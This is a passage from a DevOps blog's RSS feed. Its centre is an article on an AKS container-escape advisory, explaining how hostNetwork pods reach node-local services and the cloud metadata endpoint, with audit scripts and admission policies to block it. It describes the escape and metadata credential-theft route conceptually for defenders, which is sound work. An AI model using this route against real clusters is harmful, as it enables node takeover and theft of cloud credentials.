<li>PostgreSQL 18&#39;s <code>uuidv7()</code> is time-ordered, so inserts append at the index edge like a sequence while keeping the generate-anywhere property of a UUID. Published benchmarks show large insert-time and index-size wins on 50M rows.</li>
<li><code>bigint</code> is still the smallest and fastest key when one database owns the sequence; use <code>uuidv7()</code> when you genuinely need UUIDs, and <code>uuidv4()</code> only when you must hide creation time.</li>
<li>Adopting it is a one-line default change for new rows, with no rewrite required for existing tables. The main thing to design around is that v7 embeds a decodable timestamp, so keep it off public-facing identifiers when that matters.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[hostNetwork Is Still a Footgun: What CVE-2026-32193 Teaches Every Cluster]]></title>
      <link>https://devops-daily.com/posts/hostnetwork-footgun-cve-2026-32193</link>
      <description><![CDATA[A recent AKS advisory let an untrusted pod with hostNetwork break out to the worker node. The Azure-specific bug is patched, but the footgun that made it reachable lives on every Kubernetes cluster. Here is how the escape class works and what to actually lock down.]]></description>
      <pubDate>Tue, 30 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hostnetwork-footgun-cve-2026-32193</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[Containers]]></category><category><![CDATA[Pod Security]]></category><category><![CDATA[Networking]]></category><category><![CDATA[AKS]]></category>
      <content:encoded><![CDATA[<p>Microsoft published <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32193">CVE-2026-32193</a> in June 2026: a remote code execution flaw in Azure Kubernetes Service rated CVSS 8.8. The one-line version is short and uncomfortable. An attacker who can run an untrusted container configured with <code>hostNetwork</code> could send specially crafted requests to a host-level service that was never meant to take unauthenticated calls, exploit a path-traversal bug in it, and break out of the container onto the worker node.</p>
<p>Azure has patched the specific service. If you run AKS, the fix shipped in node image <code>2026-02-13.5</code>, and you should roll it out. But fixating on the Azure-specific bug misses the point. The reason a container could reach a privileged node service at all is <code>hostNetwork: true</code>, and that switch exists on every Kubernetes distribution. The CVE is a fresh reminder of an old truth: the moment you give a pod the host&#39;s network namespace, a pile of &quot;internal only&quot; services on that node stop being internal.</p>
<p>This post walks through what <code>hostNetwork</code> actually changes, why &quot;it only listens on localhost&quot; is not a security boundary, the NetworkPolicy gotcha that catches people out, and the concrete controls that stop this class of escape regardless of which cloud you run on.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li><code>hostNetwork: true</code> drops the pod&#39;s network namespace. The pod shares the node&#39;s network stack, so it can reach anything listening on the node&#39;s loopback (<code>127.0.0.1</code>) and link-local addresses, including cloud metadata endpoints.</li>
<li>Many node-local daemons and cloud agents bind to localhost with no authentication because they assume only the node can reach them. <code>hostNetwork</code> breaks that assumption. CVE-2026-32193 is one instance of the pattern.</li>
<li>Kubernetes NetworkPolicy does <strong>not</strong> apply to <code>hostNetwork</code> pods. Your egress rules will not save you here.</li>
<li>The fix is policy, not patching: forbid host namespaces for normal workloads with Pod Security Admission or an admission controller, audit who already has them, and block workload access to the metadata endpoint.</li>
<li>Reserve <code>hostNetwork</code> for the few system components that genuinely need it (CNI agents, kube-proxy, some node exporters) and keep them out of namespaces where application teams deploy.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A working knowledge of Kubernetes pods and namespaces</li>
<li><code>kubectl</code> access to a cluster you can audit (read access to pods across namespaces)</li>
<li>Familiarity with Linux namespaces at a high level</li>
<li>Optional: a policy engine such as Kyverno or Gatekeeper, or Pod Security Admission enabled on your namespaces</li>
</ul>
<h2 id="h2-what-cve-2026-32193-actually-was" class="group relative scroll-mt-24">
        <a href="#h2-what-cve-2026-32193-actually-was" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What CVE-2026-32193 actually was
        </a>
        </h2><p>The advisory is terse, so here is what the published metadata tells us and what it does not.</p>
<ul>
<li><strong>Class:</strong> CWE-22, improper limitation of a pathname to a restricted directory (path traversal).</li>
<li><strong>Score:</strong> CVSS 8.8, vector <code>AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</code>.</li>
<li><strong>Affected:</strong> Azure Kubernetes Service before node image <code>2026-02-13.5</code>.</li>
<li><strong>Condition:</strong> the attacker can schedule or run an untrusted container with <code>hostNetwork</code> enabled.</li>
</ul>
<p>Two parts of that vector matter for the lesson. <code>AV:L</code> (local) and <code>PR:L</code> (low privileges) mean the attacker is already inside a container on the node, not on the public internet. That is a normal day for a multi-tenant cluster or any cluster that runs partially trusted workloads, CI jobs, or customer code. And <code>S:C</code> (scope changed) is the headline: the compromise crosses a security boundary. A process confined to a container ends up controlling the node, which is a different security authority than the workload that started it.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>If you run AKS, confirm your node images are at <code>2026-02-13.5</code> or later. Check with <code>kubectl get nodes -o wide</code> and compare the node image version, or review the <a href="https://learn.microsoft.com/en-us/azure/aks/security-bulletins/overview">AKS security bulletins</a>. Patching closes this specific service, but the rest of this post is about the door it came through.</p>
</div></div></div><p>The path-traversal flaw itself is Azure&#39;s to fix and they fixed it. What you own is the condition that exposed it.</p>
<h2 id="h2-what-hostnetwork-actually-does" class="group relative scroll-mt-24">
        <a href="#h2-what-hostnetwork-actually-does" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What hostNetwork actually does
        </a>
        </h2><p>A normal pod gets its own network namespace. It has its own loopback interface, its own set of listening sockets, and its own view of the network. When that pod talks to <code>127.0.0.1</code>, it reaches itself, not the node.</p>
<p>Setting <code>hostNetwork: true</code> removes that boundary. The pod runs in the node&#39;s network namespace instead of its own.</p>
<pre><code class="hljs language-text">Normal pod                          hostNetwork: true
+-------------------------+         +-------------------------+
|  pod netns              |         |  (no pod netns)         |
|   lo -&gt; the pod itself  |         |   shares the NODE netns |
|   eth0 via CNI          |         |                         |
+-----------+-------------+         +-----------+-------------+
            |                                   |
            | CNI / NetworkPolicy applies       | talks to the node&#x27;s
            v                                   v stack directly
+-------------------------+         +-------------------------+
|  node network namespace |         |  node network namespace |
|   127.0.0.1:&lt;kubelet&gt;   |  &lt;----  |   127.0.0.1:&lt;kubelet&gt;   |
|   127.0.0.1:&lt;agents&gt;    |  reach  |   127.0.0.1:&lt;agents&gt;    |
|   169.254.169.254 IMDS  |  these  |   169.254.169.254 IMDS  |
+-------------------------+         +-------------------------+
</code></pre><p>Now <code>127.0.0.1</code> from inside the pod is the node&#39;s loopback. Every service bound to the node&#39;s loopback is one connection away. So is the cloud metadata endpoint at <code>169.254.169.254</code> and any other link-local address the node can reach. The pod did not gain a new capability in the Linux sense. It gained reach.</p>
<p>You can confirm the effect quickly. A <code>hostNetwork</code> pod sees the node&#39;s interfaces and hostname:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># A pod that shares the node&#x27;s network stack.</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hostnet-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostNetwork:</span> <span class="hljs-literal">true</span>          <span class="hljs-comment"># the footgun</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">shell</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">&#x27;sleep&#x27;</span>, <span class="hljs-string">&#x27;infinity&#x27;</span>]
</code></pre><pre><code class="hljs language-bash">kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- hostname        <span class="hljs-comment"># prints the NODE&#x27;s hostname</span>
kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- ss -lntp         <span class="hljs-comment"># lists sockets the NODE is listening on</span>
kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- curl -s http://127.0.0.1:10248/healthz   <span class="hljs-comment"># kubelet healthz, on the node&#x27;s loopback</span>
</code></pre><p>That last command is harmless on its own. The problem is everything else that also listens on the node&#39;s loopback and assumes nobody untrusted can connect.</p>
<h2 id="h2-it-only-listens-on-localhost-is-not-a-boundary" class="group relative scroll-mt-24">
        <a href="#h2-it-only-listens-on-localhost-is-not-a-boundary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          "It only listens on localhost" is not a boundary
        </a>
        </h2><p>A huge amount of software binds to <code>127.0.0.1</code> and treats that as authentication. The mental model is &quot;only code running on this machine can reach me, and code running on this machine is already trusted.&quot; On a single-tenant VM that is roughly true. On a Kubernetes node running mixed workloads it is not, because <code>hostNetwork</code> lets a pod become &quot;code running on this machine&quot; for network purposes.</p>
<p>The list of things that commonly listen on a node&#39;s loopback or link-local addresses is long:</p>
<ul>
<li>Kubelet&#39;s read-only and healthz endpoints</li>
<li>Cloud provider node agents that broker bootstrap credentials and node identity</li>
<li>The instance metadata service (IMDS) at <code>169.254.169.254</code>, which hands out the node&#39;s cloud identity and, on many setups, tokens for it</li>
<li>Local proxies, log shippers, and CSI or CNI helper sockets</li>
<li>Debug and admin endpoints that developers assumed were unreachable</li>
</ul>
<p>CVE-2026-32193 is the cloud-agent case: a node-local service that brokers privileged operations trusted its callers and had a path-traversal bug. With <code>hostNetwork</code>, an untrusted pod reached it and turned a parsing flaw into node control. This is the same shape as the IMDS credential-theft problem that has bitten cloud Kubernetes for years. If a workload can reach <code>169.254.169.254</code>, it can often assume the node&#39;s cloud identity, and on a node that means the kubelet&#39;s permissions and any IAM role attached to the node pool.</p>
<p>The takeaway is not &quot;this one Azure service was buggy.&quot; It is that a node runs a small fleet of privileged local services that were designed assuming the network namespace boundary holds. <code>hostNetwork</code> removes the boundary, so any bug in any of them becomes a node takeover.</p>
<h2 id="h2-the-networkpolicy-gotcha" class="group relative scroll-mt-24">
        <a href="#h2-the-networkpolicy-gotcha" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The NetworkPolicy gotcha
        </a>
        </h2><p>Here is the part that surprises people. You might assume a default-deny egress NetworkPolicy would stop a <code>hostNetwork</code> pod from reaching the metadata endpoint or a node-local service. It does not.</p>
<p>Kubernetes NetworkPolicy is implemented by the CNI plugin against pod network namespaces. A <code>hostNetwork</code> pod has no pod network namespace. Its traffic originates from the node&#39;s stack, which the CNI does not police the same way. The upstream documentation is explicit that NetworkPolicy behavior for <code>hostNetwork</code> pods is undefined, and in practice most CNIs do not enforce policy on them.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># This will NOT reliably stop a hostNetwork pod from reaching IMDS.</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">app</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">&#x27;Egress&#x27;</span>]
  <span class="hljs-comment"># No egress rules = deny all egress... for pods with their own netns.</span>
  <span class="hljs-comment"># hostNetwork pods bypass this.</span>
</code></pre><p>So the defense cannot be &quot;lock down egress with NetworkPolicy.&quot; If a pod has <code>hostNetwork</code>, you have already lost the network-layer control. The defense has to be earlier: do not let untrusted workloads set <code>hostNetwork</code> in the first place.</p>
<h2 id="h2-step-1-find-out-who-already-has-it" class="group relative scroll-mt-24">
        <a href="#h2-step-1-find-out-who-already-has-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: find out who already has it
        </a>
        </h2><p>Before you enforce anything, see what would break. Audit every pod and workload template that sets host namespaces or other escape-prone fields. This command lists running pods using <code>hostNetwork</code>, <code>hostPID</code>, or <code>hostIPC</code>:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;audit host-namespace pods&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;find every pod using a host namespace, across all namespaces&quot;},{&quot;cmd&quot;:&quot;kubectl get pods -A -o json | jq -r '.items[] | select(.spec.hostNetwork==true or .spec.hostPID==true or .spec.hostIPC==true) | \&quot;\\(.metadata.namespace)/\\(.metadata.name)\&quot;'&quot;,&quot;output&quot;:&quot;kube-system/cilium-abcde\nkube-system/kube-proxy-fghij\nmonitoring/node-exporter-klmno\napp/legacy-sidecar-pqrst&quot;},{&quot;comment&quot;:&quot;the kube-system entries are expected; app/legacy-sidecar is the one to question&quot;}]}"></div><p>Expect to see your CNI agent, <code>kube-proxy</code>, and node exporters. Those are legitimate and we will handle them in a moment. What you are hunting for is application workloads in team namespaces that picked up <code>hostNetwork</code> because someone copied a Helm values file or wanted to avoid a Service. Those are the workloads that turn a node-local bug into an incident.</p>
<p>Audit the templates too, not just running pods, since a Deployment can sit at zero replicas:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Scan workload templates for host namespaces and privileged settings.</span>
kubectl get deploy,daemonset,statefulset -A -o json \
  | jq -r <span class="hljs-string">&#x27;.items[]
      | select(.spec.template.spec.hostNetwork==true
            or .spec.template.spec.hostPID==true
            or .spec.template.spec.hostIPC==true
            or any(.spec.template.spec.containers[].securityContext // {}; .privileged==true))
      | &quot;\(.kind)\t\(.metadata.namespace)/\(.metadata.name)&quot;&#x27;</span>
</code></pre><h2 id="h2-step-2-forbid-host-namespaces-for-normal-workloads" class="group relative scroll-mt-24">
        <a href="#h2-step-2-forbid-host-namespaces-for-normal-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: forbid host namespaces for normal workloads
        </a>
        </h2><p>The cleanest control ships with Kubernetes. Pod Security Admission&#39;s <strong>baseline</strong> profile already forbids host namespaces (<code>hostNetwork</code>, <code>hostPID</code>, <code>hostIPC</code>), <code>hostPath</code> volumes, and privileged containers. Enforcing baseline on the namespaces where teams deploy stops this class of escape without writing a single custom rule.</p>
<p>You can apply the same intent three ways depending on what you run. All three reject the demo pod above.</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Forbid hostNetwork for application workloads&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;Pod Security Admission&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;# Label the namespace; the API server enforces it. No extra components.\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: app\n  labels:\n    pod-security.kubernetes.io/enforce: baseline\n    pod-security.kubernetes.io/enforce-version: latest\n    # 'warn' and 'audit' help you roll it out without breaking deploys first\n    pod-security.kubernetes.io/warn: baseline&quot;},{&quot;label&quot;:&quot;Kyverno&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;apiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n  name: disallow-host-namespaces\nspec:\n  validationFailureAction: Enforce\n  rules:\n    - name: host-namespaces\n      match:\n        any:\n          - resources:\n              kinds: ['Pod']\n      validate:\n        message: 'hostNetwork, hostPID and hostIPC are not allowed'\n        pattern:\n          spec:\n            =(hostNetwork): 'false'\n            =(hostPID): 'false'\n            =(hostIPC): 'false'&quot;},{&quot;label&quot;:&quot;Gatekeeper&quot;,&quot;lang&quot;:&quot;yaml&quot;,&quot;code&quot;:&quot;# Uses the templates from the gatekeeper-library host-namespaces constraint.\napiVersion: constraints.gatekeeper.sh/v1beta1\nkind: K8sPSPHostNamespace\nmetadata:\n  name: psp-host-namespace\nspec:\n  match:\n    kinds:\n      - apiGroups: ['']\n        kinds: ['Pod']\n    excludedNamespaces: ['kube-system']&quot;}]}"></div><p>Roll it out in stages. Set <code>warn</code> and <code>audit</code> first so you can see which workloads would be rejected, fix or exempt them, then flip <code>enforce</code>. Flipping straight to enforce on a busy cluster is how you find out at 2am that a DaemonSet you forgot about needed <code>hostNetwork</code>.</p>
<h2 id="h2-step-3-cut-off-the-metadata-endpoint" class="group relative scroll-mt-24">
        <a href="#h2-step-3-cut-off-the-metadata-endpoint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: cut off the metadata endpoint
        </a>
        </h2><p>Even with host namespaces locked down, normal pods can often still reach IMDS at <code>169.254.169.254</code> through the regular CNI path, and that is its own credential-theft route. Close it:</p>
<ul>
<li>On AKS, GKE, and EKS, use the provider guardrails. EKS users should move to IRSA or EKS Pod Identity and block IMDS access from pods. GKE has Workload Identity and metadata concealment. AKS has Workload Identity so pods stop needing the node&#39;s identity at all.</li>
<li>Where the CNI does enforce policy (normal pods), add an explicit egress deny to <code>169.254.169.254/32</code>.</li>
<li>Prefer per-workload cloud identity (Workload Identity / IRSA / Pod Identity) over node-attached roles, so a node compromise is worth less.</li>
</ul>
<p>None of these help a <code>hostNetwork</code> pod, which is exactly why step 2 comes first. Defense in depth means the metadata block catches the ordinary pods and the host-namespace ban catches the dangerous ones.</p>
<h2 id="h2-when-hostnetwork-is-legitimately-needed" class="group relative scroll-mt-24">
        <a href="#h2-when-hostnetwork-is-legitimately-needed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          When hostNetwork is legitimately needed
        </a>
        </h2><p><code>hostNetwork</code> is not evil. A handful of components need it because they operate on the node&#39;s networking itself:</p>
<ul>
<li>CNI agents (Cilium, Calico) that program the node&#39;s dataplane</li>
<li><code>kube-proxy</code>, which manages node-level service routing</li>
<li>Node exporters and some observability agents that read host-level network stats</li>
<li>A few ingress and load-balancer setups that bind directly to node ports for performance</li>
</ul>
<p>The rule is not &quot;never use <code>hostNetwork</code>.&quot; It is &quot;only system components use it, and they live where application teams cannot deploy.&quot; Keep those workloads in <code>kube-system</code> or a dedicated, locked-down namespace, exempt only that namespace from the policy, and treat any request to add <code>hostNetwork</code> to an application namespace as a security review, not a config tweak. If a team wants <code>hostNetwork</code> to expose a port, they almost always want a <code>Service</code> or a properly scoped <code>hostPort</code> instead.</p>
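<p>As an added example (not from the original article), the audit from step 1 can also run offline over saved <code>kubectl get ... -o json</code> output and apply the exemption rule above. It goes beyond the two <code>jq</code> commands by also checking CronJobs, init containers, and <code>hostPath</code> volumes; <code>EXEMPT_NAMESPACES</code>, the function names, and the sample manifests are assumptions constructed for illustration.</p>

```python
"""Offline audit of workload manifests for host-namespace exposure."""
import json

# Assumption: the only namespace allowed to run host-namespace workloads.
EXEMPT_NAMESPACES = {"kube-system"}
HOST_FLAGS = ("hostNetwork", "hostPID", "hostIPC")

# Constructed sample in the shape of `kubectl get ... -A -o json` output.
SAMPLE_JSON = """
{"kind": "List", "items": [
 {"kind": "DaemonSet", "metadata": {"namespace": "kube-system", "name": "cilium"},
  "spec": {"template": {"spec": {"hostNetwork": true,
    "containers": [{"name": "agent"}]}}}},
 {"kind": "DaemonSet", "metadata": {"namespace": "monitoring", "name": "node-exporter"},
  "spec": {"template": {"spec": {"hostNetwork": true, "hostPID": true,
    "containers": [{"name": "exporter"}]}}}},
 {"kind": "Deployment", "metadata": {"namespace": "app", "name": "legacy-sidecar"},
  "spec": {"replicas": 0, "template": {"spec": {"hostNetwork": true,
    "containers": [{"name": "sidecar"}]}}}},
 {"kind": "CronJob", "metadata": {"namespace": "app", "name": "nightly-backup"},
  "spec": {"jobTemplate": {"spec": {"template": {"spec": {
    "initContainers": [{"name": "prep", "securityContext": {"privileged": true}}],
    "containers": [{"name": "backup"}],
    "volumes": [{"name": "data", "hostPath": {"path": "/var/lib"}}]}}}}}},
 {"kind": "Pod", "metadata": {"namespace": "app", "name": "web"},
  "spec": {"containers": [{"name": "web", "securityContext": {"privileged": false}}]}}
]}
"""


def load_items(text):
    """Accept either a List document or a single object."""
    doc = json.loads(text)
    return doc["items"] if "items" in doc else [doc]


def pod_spec(obj):
    """Return the pod spec of a Pod, a workload template, or a CronJob."""
    spec = obj.get("spec") or {}
    if obj.get("kind") == "Pod":
        return spec
    if obj.get("kind") == "CronJob":
        # CronJobs nest the pod template one level deeper.
        spec = (spec.get("jobTemplate") or {}).get("spec") or {}
    return (spec.get("template") or {}).get("spec") or {}


def risky_fields(spec):
    """List the escape-prone settings present in one pod spec."""
    found = [flag for flag in HOST_FLAGS if spec.get(flag) is True]
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for container in containers:
        if (container.get("securityContext") or {}).get("privileged") is True:
            found.append("privileged:" + container.get("name", "?"))
    for volume in spec.get("volumes") or []:
        if volume.get("hostPath"):
            found.append("hostPath:" + volume["hostPath"].get("path", "?"))
    return found


def audit(items, exempt=EXEMPT_NAMESPACES):
    """Split findings into expected (exempt namespace) and needs-review."""
    report = {"expected": [], "review": []}
    for obj in items:
        fields = risky_fields(pod_spec(obj))
        if not fields:
            continue
        meta = obj.get("metadata") or {}
        namespace = meta.get("namespace", "default")
        entry = (obj.get("kind", "?"), namespace + "/" + meta.get("name", "?"), fields)
        report["expected" if namespace in exempt else "review"].append(entry)
    return report


if __name__ == "__main__":
    result = audit(load_items(SAMPLE_JSON))
    for bucket in ("expected", "review"):
        for kind, name, fields in result[bucket]:
            print(bucket.upper(), kind, name, ",".join(fields), sep="\t")
```

<p>The node exporter lands in the review bucket because its namespace is not on the exempt list, and the zero-replica Deployment is caught because the script reads templates rather than running pods.</p>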
<h2 id="h2-key-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-key-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Key takeaways
        </a>
        </h2><ul>
<li><code>hostNetwork: true</code> is a reach amplifier. It does not add Linux capabilities, it removes the network namespace boundary, and that boundary is what keeps untrusted pods away from privileged node-local services and the metadata endpoint.</li>
<li>CVE-2026-32193 is one bug in one Azure service, but the pattern is universal. Every node runs local daemons that trust local callers, so any one of them becomes a node takeover once a pod shares the host network.</li>
<li>NetworkPolicy does not apply to <code>hostNetwork</code> pods. Do not rely on egress rules to contain them.</li>
<li>Enforce Pod Security Admission baseline (or an equivalent admission policy) on application namespaces, audit what already uses host namespaces, and block workload access to IMDS with per-workload cloud identity.</li>
<li>Patch your nodes, then fix the door: keep <code>hostNetwork</code> for the few system components that need it and out of every namespace where untrusted or application code runs.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 27, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-27</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 29 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-27</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-etcd-operator-joins-cozystack-with-a-new-v1alpha2-api" class="group relative scroll-mt-24">
        <a href="#h3-etcd-operator-joins-cozystack-with-a-new-v1alpha2-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 etcd-operator joins Cozystack with a new v1alpha2 API
        </a>
        </h3><p>The etcd-operator project, which develops an operator for deploying and maintaining etcd clusters on Kubernetes, has been donated to the Cozystack project. Alongside the donation, a from-scratch imple</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/29/etcd-operator-joins-cozystack-with-a-new-v1alpha2-api/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-source-maintainership-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-open-source-maintainership-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open source maintainership in the age of AI
        </a>
        </h3><p>AI has really changed the game around software development. More people are leveraging AI than ever to contribute patches to projects they use. To me, this is a good thing as more folks will contribut</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/26/open-source-maintainership-in-the-age-of-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes" class="group relative scroll-mt-24">
        <a href="#h3-security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Security Profiles Operator v1: Stable APIs, Security Hardened, and Shaping Upstream Kubernetes
        </a>
        </h3><p>Linux provides powerful kernel-level security mechanisms, seccomp, SELinux, and AppArmor, that restrict what containerized workloads can do. Each uses profiles that define permitted behavior, but writ</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/26/security-profiles-operator-v1-stable-apis-security-hardened-and-shaping-upstream-kubernetes/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-cluster-api-plugin-for-headlamp" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-cluster-api-plugin-for-headlamp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the Cluster API plugin for Headlamp
        </a>
        </h3><p>Headlamp is an open-source, extensible Kubernetes SIG UI project designed to let you explore, manage, and debug cluster resources directly from a browser. Cluster API (CAPI) is a Kubernetes sub-projec</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/headlamp-cluster-api-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-inspect-volcano-workloads-faster-with-headlamp" class="group relative scroll-mt-24">
        <a href="#h3-inspect-volcano-workloads-faster-with-headlamp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inspect Volcano workloads faster with Headlamp
        </a>
        </h3><p>Volcano is a cloud native batch scheduler for Kubernetes, built for high-performance computing, AI/ML, and other batch workloads. Headlamp is an extensible Kubernetes web UI. With its plugin system, H</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/visual-context-volcano-headlamp-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-see-your-serverless-introducing-the-headlamp-plugin-for-knative" class="group relative scroll-mt-24">
        <a href="#h3-see-your-serverless-introducing-the-headlamp-plugin-for-knative" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 See your serverless: introducing the Headlamp plugin for Knative
        </a>
        </h3><p>Headlamp is an open-source, extensible Kubernetes SIG UI project designed to let you explore, manage, and debug cluster resources. Knative brings serverless workloads to Kubernetes, handling traffic r</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/25/headlamp-knative-plugin/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-increasing-hardware-costs-get-more-from-your-vm-estate-with-red-hat-openshift-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-increasing-hardware-costs-get-more-from-your-vm-estate-with-red-hat-openshift-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Increasing hardware costs? Get more from your VM estate with Red Hat OpenShift Virtualization
        </a>
        </h3><p>For teams running virtualization estates of any size today, three pressures are converging at once. Hardware budgets that looked generous in late 2024 have been blindsided by memory costs, turning rou</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/increasing-hardware-costs-get-more-your-vm-estate-red-hat-openshift-virtualization"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode" class="group relative scroll-mt-24">
        <a href="#h3-faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
